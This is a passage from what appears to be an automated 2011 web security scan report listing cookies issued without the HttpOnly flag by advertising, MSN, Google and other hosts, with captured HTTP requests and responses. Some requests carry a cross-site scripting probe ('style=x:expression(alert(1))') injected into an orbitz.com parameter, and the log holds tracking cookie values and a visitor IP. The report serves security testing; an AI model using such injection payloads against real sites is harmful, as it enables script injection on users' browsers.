BASE=TPQQLfQBxZgcD514adQ2mjv0dgQLL5FAodEV5BC!; domain=advertising.com; expires=Thu, 31-Jan-2013 15:23:10 GMT; path=/
ROLL=gqwLYPcy+hFCk4E!; domain=advertising.com; expires=Thu, 31-Jan-2013 15:23:10 GMT; path=/
10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=749715/size=160600/u=2/bnum=29104868/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=HVCSNJpwHg02FN5BdbdRTewUwX0kH8Y4FN5BYTeRTeQ3gZ0kHQTnGN5BF2pRTeAohX0kHYZ4FN5BKGeRTewohX0kHca4FN5BiGeRTeQshX0kwOIAM/oBqJ7YBwAoGG5r1NQcKa4dGKmAI9YBxO53DkL3Fh3gPTw6TVEnsuWB/0mxpda7GIaWGbUrMaw41ZAVkqlB6bjxTr6bCwWZGG/r4fQsMasbwa3BW8oxu1I9HsfzFB3sNeQQoa0ks2zB1xmBmD; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
F1=BcUJI1EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
BASE=YnQI+8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlpM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAO!; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
ROLL=v5Q2V0MtUuzqOtG!; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.918410.749715.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 01 Feb 2011 15:22:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 15:22:47 GMT
Connection: close
Set-Cookie: C2=HVCSNJpwHg02FN5BdbdRTewUwX0kH8Y4FN5BYTeRTeQ3gZ0kHQTnGN5BF2pRTeAohX0kHYZ4FN5BKGeRTewohX0kHca4FN5BiGeRTeQshX0kwOIAM/oBqJ7YBwAoGG5r1NQcKa4dGKmAI9YBxO53DkL3Fh3gPTw6TVEnsuWB/0mxpda7GIaWGbUrMaw41ZAVkqlB6bjxTr6bCwWZGG/r4fQsMasbwa3BW8oxu1I9HsfzFB3sNeQQoa0ks2zB1xmBmD; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
Set-Cookie: F1=BcUJI1EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
Set-Cookie: BASE=YnQI+8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlpM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAO!; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
Set-Cookie: ROLL=v5Q2V0MtUuzqOtG!; domain=advertising.com; expires=Thu, 31-Jan-2013 15:22:48 GMT; path=/
Set-Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
Content-Length: 1043

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

12.417. http://realestate.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.msn.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=972771e7f6834558a0e38a98ab1cff0e; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=95187FB7560B4B81B88E519BA8908F2A; domain=.msn.com; expires=Sun, 21-Aug-2011 15:40:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: realestate.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.418. http://realestate.msn.com/slideshow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.msn.com
Path:	/slideshow.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=26fbb56ea10c4d5cac17f2337767ccbe; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=402987C945B0433BA1FE4A28CCFD831E; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /slideshow.aspx HTTP/1.1
Host: realestate.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.419. http://sales.liveperson.net/hc/15744040/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/15744040/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LivePersonID=-16101423669632-1296573858:0; expires=Wed, 01-Feb-2012 15:24:18 GMT; path=/hc/15744040; domain=.liveperson.net
HumanClickKEY=699244399384198284; path=/hc/15744040
HumanClickSiteContainerID_15744040=STANDALONE; path=/hc/15744040
LivePersonID=-16101423669632-1296573858:-1:-1:-1:-1; expires=Wed, 01-Feb-2012 15:24:18 GMT; path=/hc/15744040; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.420. http://sales.liveperson.net/hc/15744040/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/15744040/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=699244399384198284; path=/hc/15744040
HumanClickACTIVE=1296573857200; expires=Wed, 02-Feb-2011 15:24:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/15744040/?&site=15744040&cmd=mTagKnockPage&lpCallId=903212915639-545244525652&protV=20&lpjson=1&id=2998336854&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:24:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=699244399384198284; path=/hc/15744040
Set-Cookie: HumanClickACTIVE=1296573857200; expires=Wed, 02-Feb-2011 15:24:17 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 01 Feb 2011 15:24:17 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1400

lpConnLib.Process({"ResultSet": {"lpCallId":"903212915639-545244525652","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

12.421. http://scholar.google.com/scholar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scholar.google.com
Path:	/scholar

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

GSP=ID=1524e3b5f366319b; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
PREF=ID=1524e3b5f366319b:TM=1296661266:LM=1296661266:S=-zH5XuNrRNUiArmn; expires=Fri, 01-Feb-2013 15:41:06 GMT; path=/; domain=.google.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.422. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scripts.omniture.com
Path:	/global/scripts/targeting/dyn_prop.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_omniture=84542986.5892.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/targeting/dyn_prop.php HTTP/1.1
Host: scripts.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7?f=2o7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniture_unique=c4b47f0affb47cea2cd263f6285f016c; cms_site_lang=1; use207=7; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 02 Feb 2011 19:39:25 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 04 Oct 2010 17:31:59 GMT
xserver: www5.dmz
Content-Length: 484
Content-Type: application/javascript
Date: Wed, 02 Feb 2011 15:39:25 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

mboxCreate('omniTargetingInfo',
'profile.geo_ip=173.193.214.243',
'profile.geo_zip=75207',
'profile.geo_gmt_offset=-600',
'profile.geo_country=usa',
'profile.geo_country_code=840',
'profile.geo_region
...[SNIP]...

12.423. http://search.aol.com/%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.aol.com
Path:	/%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

clickstreamid=1540104739320388577
TBS=prod:1296661272633:0; Domain=search.aol.com; Path=/
s_guid=45d2e24dc47148b195beda94ba0094c2:020211; Domain=search.aol.com; Expires=Thu, 01-Mar-2012 15:41:12 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C HTTP/1.1
Host: search.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 406 Not Acceptable
Date: Wed, 02 Feb 2011 15:41:12 GMT
Set-Cookie: clickstreamid=1540104739320388577
Set-Cookie: TBS=prod:1296661272633:0; Domain=search.aol.com; Path=/
Set-Cookie: s_guid=45d2e24dc47148b195beda94ba0094c2:020211; Domain=search.aol.com; Expires=Thu, 01-Mar-2012 15:41:12 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Length: 1070
Keep-Alive: timeout=5, max=989
Connection: Keep-Alive

<html><head><title>Apache Tomcat/5.5.27 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

12.424. http://segment-pixel.invitemedia.com/set_partner_uid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/set_partner_uid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

partnerUID="eyI4NCI6IFsiRFRRa2U3VDk5OVk0cVlKQiIsIHRydWVdfQ=="; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:31:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.425. http://segment-pixel.invitemedia.com/setuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/setuid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:17:19 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.426. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pubfreq_26263_21091_1958077417=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:22 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21091&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=3366FF&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263&kltstamp=2011-1-1%209%3A23%3A30&ranreq=0.3423423212952912&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=937x643&adVisibility=3 HTTP/1.1
Host: showads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; KTPCACOOKIE=YES

Response

12.427. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pubfreq_26263_21090_518704196=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.428. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pubfreq_26263_21091_7175966=207-1; domain=pubmatic.com; expires=Tue, 01-Feb-2011 16:03:09 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.429. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pubfreq_26263_21090_1148357966=207-1; domain=pubmatic.com; expires=Tue, 01-Feb-2011 16:03:12 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.430. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pubfreq_26263_21091_1565598199=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:15 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.431. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pubfreq_26263_21090_1782538825=207-1; domain=pubmatic.com; expires=Tue, 01-Feb-2011 16:02:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.432. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pubfreq_26263_21091_156876156=207-1; domain=pubmatic.com; expires=Tue, 01-Feb-2011 16:02:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21091&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=3366FF&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263&kltstamp=2011-1-1%209%3A23%3A30&ranreq=0.3423423212952912&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=937x643&adVisibility=3 HTTP/1.1
Host: showads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; KTPCACOOKIE=YES

Response

12.433. http://showads.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pubfreq_26263_21090_577101722=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:12 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.434. http://sitelife.ehow.com/ver1.0/Direct/Process previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.ehow.com
Path:	/ver1.0/Direct/Process

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SiteLifeHost=SJL01WSITEHW12proddmlocal; domain=ehow.com; path=/
BIGipServerEhowSitelife-80=624690954.20480.0000; path=/ ; domain=ehow.com; path=/
anonId=15cddfdf-c3b2-4d8c-84fb-a4c785aba07c; domain=ehow.com; expires=Thu, 02-Feb-2012 15:41:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Direct/Process HTTP/1.1
Host: sitelife.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.435. https://sitesearch.omniture.com/center/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sitesearch.omniture.com
Path:	/center/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

v1stsp=C92D8F8B772AFF13; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.436. http://social.entertainment.msn.com/bloglist.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.msn.com
Path:	/bloglist.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=753ef5beea254d60bfd0840e3985ef58; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=DA434B0612654AEBB69FFCCC55E457D5; domain=.entertainment.msn.com; expires=Sun, 21-Aug-2011 15:41:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bloglist.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.437. http://social.entertainment.msn.com/movies/blogs/the-hitlist-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.msn.com
Path:	/movies/blogs/the-hitlist-blog.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=97142110ead246b4af23d3e80090af68; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=F3F4A38801974D0F91EB4A0695CB7A94; domain=.entertainment.msn.com; expires=Sat, 20-Aug-2011 15:37:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies/blogs/the-hitlist-blog.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.438. http://social.entertainment.msn.com/tv/blogs/reality-tv-blog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.entertainment.msn.com
Path:	/tv/blogs/reality-tv-blog.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=f8adf43341b7471fa5e7914cf1d7dc0a; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=6AEC06D8BAB44686824F2C0182468746; domain=.entertainment.msn.com; expires=Sat, 20-Aug-2011 15:37:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tv/blogs/reality-tv-blog.aspx HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.439. http://sorry.google.com/sorry/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sorry.google.com
Path:	/sorry/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

S=sorry=6N0zPerLQtaqcOPwyzNvWg; path=/; domain=google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.440. http://sorry.google.com/sorry/Captcha previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sorry.google.com
Path:	/sorry/Captcha

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

S=sorry=6N0zPerLQtaqcOPwyzNvWg; path=/; domain=google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.441. http://specials.msn.com/A-List/Entertainment/Ali-Larters-baby-story.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Ali-Larters-baby-story.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=ae4dd02d216846f9a2770a414b91bc69; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=DE7AAEEE18C34AB2A9596B0681A0D117; domain=.msn.com; expires=Sat, 20-Aug-2011 15:37:49 GMT; path=/

